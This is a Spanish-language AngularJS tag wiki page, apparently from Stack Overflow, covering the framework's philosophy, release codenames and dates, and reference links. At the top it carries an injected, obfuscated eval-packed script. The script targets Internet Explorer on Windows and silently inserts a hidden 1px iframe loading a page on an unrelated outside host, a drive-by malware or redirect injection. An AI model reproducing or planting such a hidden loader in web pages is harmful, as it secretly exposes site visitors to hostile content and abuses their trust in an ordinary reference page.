<sc​ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do​cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get​ElementById|function|createElement|iframe|append​Child|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
</sc​ript> 

<p><strong><em><a href="https://angularjs.org/" rel="nofollow noreferrer">AngularJS</a></em></strong> es un framework de JavaScript de código abierto. Su objetivo es aumentar las aplicaciones basadas en navegador con Modelo-Vista-Lo (MV *) "Model–View–Whatever" y reducir la cantidad de código JavaScript necesario para hacer aplicaciones web funcionales. Este tipo de aplicaciones también se conocen con frecuencia como aplicaciones de una sola página (Single-Page-Application).</p>

<p>Este framework adapta y amplía el HTML tradicional para servir mejor contenido dinámico a través de un data-binding bidireccional que permite la sincronización automática de modelos y vistas.</p>

<p>AngularJS fue desarrollado y es mantenido por Google, y se utiliza <a href="https://docs.google.com/presentation/d/1-M5U0B6JI2JKU2ibVmU-xKkR7a88Uz1ZN0pc2lEuGzE/edit?pli=1#slide=id.g48b143717_069" rel="nofollow noreferrer">internamente por 1600+ aplicaciones</a>. La versión inicial se llevó a cabo en 2009.</p>

<h3>Uso de <a href="/questions/tagged/angularjs" class="post-tag" title="mostrar preguntas con la etiqueta &quot;angularjs&quot;" rel="tag">angularjs</a></h3>

<ul>
<li>Usar esta etiqueta para AngularJS 1.x.</li>
<li>Para Angular 2 o superior, usar la etiqueta <a href="/questions/tagged/angular" class="post-tag" title="mostrar preguntas con la etiqueta &quot;angular&quot;" rel="tag">angular</a>.</li>
</ul>

<h2>Filosofía</h2>

<ul>
<li>La filosofía angularjs anima a los desarrolladores a crear sus propias directivas, convirtiendo el HTML en un <a href="https://es.wikipedia.org/wiki/Lenguaje_espec%C3%ADfico_del_dominio" rel="nofollow noreferrer">DSL</a> adecuado para la construcción de su tipo de aplicación. El resultado reduce significativamente la cantidad y complejidad de JavaScript necesario para construir aplicaciones web.</li>
<li>La filosofía angularjs es que la interfaz de usuario se describe mejor en forma declarativa (HTML), y que el comportamiento se describe mejor en forma imperativa (JavaScript) y que los dos nunca se reúnan.</li>
</ul>

<h2>Versiones</h2>

<p><strong>AngularJS notables versiones, nombres en clave y las fechas de lanzamiento son:</strong></p>

<pre class="lang-none prettyprint-override"><code>AngularJS 1.0.0 [temporal-domination]      (6 de junio de 2012)
AngularJS 1.1.0 [increase-gravatas]        (31 de agosto de 2012)
AngularJS 1.2.0 [timely-delivery]          (8 de noviembre de 2013)
AngularJS 1.3.0 [superluminal-nudge]       (13 de octubre de 2014)
AngularJS 1.4.0 [jaracimrman-existence]    (26 de mayo de 2015)
AngularJS 1.5.0 [ennoblement-facilitation] (05 de Febrero de 2016)
</code></pre>

<p><strong>La última versión estable:</strong></p>

<pre class="lang-none prettyprint-override"><code>AngularJS 1.5.8 [arbitrary-fallbacks]      (22 de Julio de 2016)
</code></pre>

<p><strong>Actualmente en desarrollo</strong></p>

<pre class="lang-none prettyprint-override"><code>AngularJS 2.0.0
</code></pre>

<p><sup>*<a href="https://github.com/angular/angular" rel="nofollow noreferrer">Candidata a lanzamiento en GitHub</a></sup></p>

<h2>Referencias</h2>

<ol>
<li><a href="https://angularjs.org/" rel="nofollow noreferrer">Sitio oficial</a></li>
<li><a href="http://tombatossals.github.io/angularjs-tutorial/#/" rel="nofollow noreferrer">Tutorial sencillo de AngularJS (tombatossals.github.io)</a></li>
<li><a href="http://www.desarrolloweb.com/manuales/manual-angularjs.html" rel="nofollow noreferrer">Manual de AngularJS (desarrolloweb.com)</a></li>
<li><a href="https://docs.angularjs.org/tutorial" rel="nofollow noreferrer">Tutorial oficial (<em>inglés</em>)</a></li>
<li><a href="https://docs.angularjs.org/api" rel="nofollow noreferrer">Documentación de APIs (<em>inglés</em>)</a></li>
<li><a href="https://docs.angularjs.org/guide" rel="nofollow noreferrer">Manual para el desarrollador (<em>inglés</em>)</a></li>
<li><a href="https://dashboard.angularjs.org/" rel="nofollow noreferrer">Dashboard (<em>inglés</em>)</a></li>
</ol>
